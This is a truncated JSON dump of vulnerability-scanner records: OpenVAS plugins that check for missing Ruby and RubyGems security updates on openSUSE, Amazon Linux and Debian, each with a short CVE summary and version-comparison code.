rpm:\"ruby2.3-doc-ri~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2\", rpm:\"libruby2_2-2_2~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2-debuginfo\", rpm:\"libruby2_2-2_2-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2\", rpm:\"ruby2.2~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debuginfo\", rpm:\"ruby2.2-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debugsource\", rpm:\"ruby2.2-debugsource~2.2.6~6.1\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel\", rpm:\"ruby2.2-devel~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel-extra\", rpm:\"ruby2.2-devel-extra~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc\", rpm:\"ruby2.2-doc~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib\", rpm:\"ruby2.2-stdlib~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib-debuginfo\", rpm:\"ruby2.2-stdlib-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk\", rpm:\"ruby2.2-tk~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk-debuginfo\", rpm:\"ruby2.2-tk-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc-ri\", rpm:\"ruby2.2-doc-ri~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:59:49", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120442", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the 
referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120442\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:31 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-547)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby20 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-547.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby20\", rpm:\"ruby20~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-devel\", rpm:\"ruby20-devel~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-debuginfo\", rpm:\"ruby20-debuginfo~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem20-io-console\", rpm:\"rubygem20-io-console~0.4.2~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem20-bigdecimal\", rpm:\"rubygem20-bigdecimal~1.2.0~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ruby20-libs\", rpm:\"ruby20-libs~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems20-devel\", rpm:\"rubygems20-devel~2.0.14~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems20\", rpm:\"rubygems20~2.0.14~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-irb\", rpm:\"ruby20-irb~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-doc\", rpm:\"ruby20-doc~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T23:00:05", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-549)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120440", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120440", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR 
A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120440\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:29 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-549)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby22 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-549.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"rubygem22-io-console\", rpm:\"rubygem22-io-console~0.4.3~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-devel\", rpm:\"ruby22-devel~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-libs\", rpm:\"ruby22-libs~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-debuginfo\", rpm:\"ruby22-debuginfo~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem22-bigdecimal\", rpm:\"rubygem22-bigdecimal~1.2.6~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"rubygem22-psych\", rpm:\"rubygem22-psych~2.0.8~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-doc\", rpm:\"ruby22-doc~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-irb\", rpm:\"ruby22-irb~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems22-devel\", rpm:\"rubygems22-devel~2.4.5~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems22\", rpm:\"rubygems22~2.4.5~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T22:58:49", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120441", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120441\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:30 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-548)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby21 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-548.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-devel\", rpm:\"ruby21-devel~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-libs\", rpm:\"ruby21-libs~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21\", rpm:\"ruby21~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem21-bigdecimal\", rpm:\"rubygem21-bigdecimal~1.2.4~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem21-io-console\", rpm:\"rubygem21-io-console~0.4.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ruby21-debuginfo\", rpm:\"ruby21-debuginfo~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems21\", rpm:\"rubygems21~2.2.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems21-devel\", rpm:\"rubygems21-devel~2.2.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-doc\", rpm:\"ruby21-doc~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-irb\", rpm:\"ruby21-irb~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:06:59", "description": "Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby", "cvss3": {}, "published": "2018-09-03T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-1480-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891480", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891480\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-2337\", \"CVE-2018-1000073\", \"CVE-2018-1000074\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-1480-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-03 00:00:00 +0200 (Mon, 03 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class\nmethod. 
Attacker passing different type of object than String as\n'retval' argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability in\ninstall_location function of package.rb that can result in path\ntraversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data\nvulnerability in owner command that can result in code\nexecution. This attack appear to be exploitable via victim must\nrun the `gem owner` command on a gem with a specially crafted YAML\nfile.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:07:15", "description": "Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. 
The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\nor MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nDescription truncated. Please see the references for more information.", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-1421-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-0899", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2016-2339", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2016-7798", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2015-9096", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891421", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891421\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2015-9096\", \"CVE-2016-2339\", \"CVE-2016-7798\", \"CVE-2017-0898\", \"CVE-2017-0899\",\n \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\",\n \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17742\", \"CVE-2017-17790\",\n \"CVE-2018-1000075\", \"CVE-2018-1000076\", \"CVE-2018-1000077\", \"CVE-2018-1000078\", \"CVE-2018-1000079\",\n \"CVE-2018-6914\", \"CVE-2018-8777\", \"CVE-2018-8778\", \"CVE-2018-8779\", \"CVE-2018-8780\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-1421-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', 
these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\nor MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nDescription truncated. Please see the references for more information.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:12:22", "description": "According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. 
